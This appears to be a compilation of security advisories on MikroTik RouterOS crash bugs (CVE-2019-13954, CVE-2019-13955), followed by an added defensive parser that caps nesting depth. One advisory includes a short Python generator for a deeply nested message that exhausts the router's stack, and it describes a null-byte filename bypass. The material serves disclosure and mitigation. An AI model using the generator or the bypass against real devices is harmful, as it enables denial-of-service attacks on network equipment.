> An authenticated remote user can crash the console process due to a NULL
> pointer reference by sending a crafted packet.
>
> 2. The console process suffers from an assertion failure issue. There is a
> reachable assertion in the console process. An authenticated remote user
> can crash the console process due to assertion failure by sending a crafted
> packet.
>
> Solution
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.6 (Long-term release tree)
Fixed Versions: 6.44.6 (Long-term release tree)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switch, router and access point.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS long-term release tree when found. Maybe other release trees also suffer from these issues.

1. The console process suffers from a memory corruption issue. An authenticated remote user can crash the console process due to a NULL pointer reference by sending a crafted packet.

2. The console process suffers from an assertion failure issue. There is a reachable assertion in the console process. An authenticated remote user can crash the console process due to assertion failure by sending a crafted packet.


Solution

Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.5 (Long-term release tree), before 6.45.1 (Stable release tree)
Fixed Versions: 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree)
Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree
Vendor Status: fixed version released
CVE: CVE-2019-13954, CVE-2019-13955
Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switch, router and access point.


Details of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS 6.42.11 and 6.43.16 (Long-term release tree) when found.

1. CVE-2019-13954: memory exhaustion via a crafted POST request
This vulnerability is similar to CVE-2018-1157. An authenticated user can cause the www binary to consume all memory via a crafted POST request to /jsproxy/upload. It's because of the incomplete fix for CVE-2018-1157. Based on the poc for cve_2018_1157 provided by @Jacob Baines (really appreciate!), crafting a filename ending with many '\x00' can bypass the original fix to trigger the vulnerability.

2. CVE-2019-13955: stack exhaustion via recursive parsing of JSON
This vulnerability is similar to CVE-2018-1158. An authenticated user communicating with the www binary can trigger a stack exhaustion vulnerability via recursive parsing of JSON containing message type M. Based on the poc for cve_2018_1158 provided by @Jacob Baines (really appreciate!), crafting a JSON message with type M can trigger the vulnerability. A simple Python script to generate the crafted message is as follows.

    msg = "{M01:[M01:[]]}"
    for _ in xrange(2000):
        # each pass nests one more M-type message inside the innermost []
        msg = msg.replace('[]', "[M01:[]]")


Solution

Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree).


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[2] https://github.com/tenable/routeros
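CVE-2019-13955 above is an unbounded-recursion bug: each nested M-type message costs the parser one more stack frame, so a message produced by the generator in the advisory runs the www process out of stack. The Python example below is added here and is not the advisory's, Tenable's or MikroTik's code; the bracketed message grammar it parses is a simplified assumption modelled on the {M01:[M01:[]]} sample above, not the real jsproxy format. It shows the mitigation side: a recursive-descent parser that carries an explicit depth counter and rejects the message once a limit is exceeded, plus a linear bracket-depth pre-check that needs no recursion at all. build_nested reproduces the advisory's generator in Python 3 so the guards can be exercised against the same input.

```python
import re


class NestingTooDeep(ValueError):
    """Raised when M-type sub-messages nest deeper than the configured limit."""


_KEY = re.compile(r'[A-Za-z][0-9a-fA-F]+')    # assumed key form: type letter + hex id, e.g. M01
_LITERAL = re.compile(r"\d+|'[^']*'")         # assumed scalar values: integer or quoted string


class MessageParser:
    """Recursive-descent parser for a simplified, assumed jsproxy-like grammar:
         message := '{' fields '}'  |  '[' fields ']'   (the bracket form is a nested message)
         field   := key ':' (message | literal)          (keys starting with M hold a message)
    """

    def __init__(self, text, max_depth):
        self.s, self.i, self.max_depth = text, 0, max_depth

    def _peek(self):
        return self.s[self.i] if self.i < len(self.s) else ''

    def _expect(self, ch):
        if self._peek() != ch:
            raise ValueError('expected %r at offset %d' % (ch, self.i))
        self.i += 1

    def _token(self, regex):
        m = regex.match(self.s, self.i)
        if not m:
            raise ValueError('bad token at offset %d' % self.i)
        self.i = m.end()
        return m.group(0)

    def parse_message(self, open_ch, close_ch, depth):
        # The guard the vulnerable parser lacked: refuse before recursing any further.
        if self.max_depth is not None and depth > self.max_depth:
            raise NestingTooDeep('nesting depth %d exceeds limit %d' % (depth, self.max_depth))
        self._expect(open_ch)
        fields = {}
        while self._peek() != close_ch:
            key = self._token(_KEY)
            self._expect(':')
            if key[0] == 'M':                                   # nested message: the recursive case
                fields[key] = self.parse_message('[', ']', depth + 1)
            else:
                lit = self._token(_LITERAL)
                fields[key] = lit[1:-1] if lit.startswith("'") else int(lit)
            if self._peek() == ',':
                self.i += 1
        self._expect(close_ch)
        return fields


def parse(text, max_depth=64):
    """Parse one message; max_depth=None reproduces the unbounded behaviour."""
    p = MessageParser(text, max_depth)
    result = p.parse_message('{', '}', 1)
    if p.i != len(text):
        raise ValueError('trailing data at offset %d' % p.i)
    return result


def max_bracket_depth(text):
    """Linear, recursion-free pre-check: deepest {[ nesting in the raw message.
    Cheap enough to run on every request before the real parser ever sees it."""
    depth = deepest = 0
    for ch in text:
        if ch in '{[':
            depth += 1
            deepest = max(deepest, depth)
        elif ch in '}]':
            depth -= 1
    return deepest


def build_nested(levels):
    """The advisory's generator, written for Python 3 (range instead of xrange)."""
    msg = "{M01:[M01:[]]}"
    for _ in range(levels):
        msg = msg.replace('[]', "[M01:[]]")
    return msg


if __name__ == '__main__':
    bomb = build_nested(2000)
    print('bracket depth of generated message:', max_bracket_depth(bomb))
    try:
        parse(bomb, max_depth=None)      # no limit: Python's own stack guard trips instead
    except RecursionError:
        print('unbounded parser: RecursionError (stack exhaustion in native code)')
    try:
        parse(bomb)                      # default limit of 64 rejects it after 65 frames
    except NestingTooDeep as e:
        print('bounded parser:', e)
```

The depth limit belongs in the parser itself rather than only in the pre-check, because the pre-check can be fooled by brackets inside quoted strings; the pre-check is still worth keeping as a cheap first filter that drops obviously hostile input before any allocation happens. Sixty-four is an arbitrary ceiling chosen here; the right value is whatever the legitimate protocol actually needs plus a small margin.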